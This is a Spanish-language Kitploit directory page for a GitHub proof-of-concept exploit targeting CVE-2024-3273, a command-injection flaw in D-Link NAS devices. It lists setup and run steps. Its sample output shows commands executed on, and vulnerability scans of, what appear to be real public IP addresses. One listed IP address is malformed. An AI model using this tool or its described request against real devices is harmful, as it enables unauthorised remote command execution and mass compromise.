Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-3273 — Exploit para CVE-2024-3273, soporta hosts individuales y múltiples | Kitploit
Herramientas/GitHubGitHub/adhikara13/cve-2024-3273
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubadhikara13/cve-2024-3273

CVE-2024-3273

Exploit para CVE-2024-3273, soporta hosts individuales y múltiples

Ver Repositorio
1311hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-3273 Prueba de concepto (PoC)

Este repositorio contiene una prueba de concepto (PoC) para CVE-2024-3273, una vulnerabilidad de seguridad descubierta en dispositivos NAS de D-Link. La vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios en dispositivos vulnerables.

Descripción

CVE-2024-3273 es una vulnerabilidad en dispositivos NAS de D-Link que permite a atacantes remotos ejecutar comandos arbitrarios mediante una solicitud HTTP manipulada al endpoint cgi-bin/nas_sharing.cgi.

Esta PoC demuestra cómo se puede explotar la vulnerabilidad para ejecutar comandos en dispositivos NAS de D-Link vulnerables.

Requisitos

  • Python 3.x
  • Librería requests

Uso

  1. Clona este repositorio:

    root@kitploit:~
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    
  2. Navega al directorio del repositorio:

    root@kitploit:~
    cd CVE-2024-3273
    
  • Ejecuta la PoC:

    root@kitploit:~
    python main.py
    
  • Sigue las instrucciones en pantalla para elegir el dispositivo objetivo:

    • Opción 1: Host único (1): Introduce los datos de un único dispositivo objetivo, incluyendo la dirección IP del host y el comando a ejecutar.
    • Opción 2: Varios hosts (2): Proporciona un archivo que contenga varios dispositivos objetivo en el formato host:port, y elige si deseas exportar los hosts vulnerables a vulnerables.txt.
  • Ejemplo

    root@kitploit:~
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 1
    Enter the host: 114.32.179.200
    Enter the command to run: ls
    Response from 114.32.179.200:
    box.cgi
    codepage_mgr.cgi
    download_mgr.cgi
    dropbox.cgi
    folder_tree.cgi
    
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 2
    Enter the file path containing hosts: list.txt
    Export vulnerable host to vulnerables.txt? (y/n): y
    Connection error for host 87.205.188.21:9290.
    Connection error for host 186.212.112.141:8081.
    Host 124.120.263.149:8032 is vulnerable.
    

    Descargo de responsabilidad

    Esta PoC es solo para fines educativos y de investigación. Úsala de manera responsable y únicamente en dispositivos para los que tengas autorización de prueba.

    Contribuciones

    ¡Las contribuciones son bienvenidas! Si encuentras algún problema o mejora, no dudes en abrir un issue o crear una pull request.

    Descargar herramienta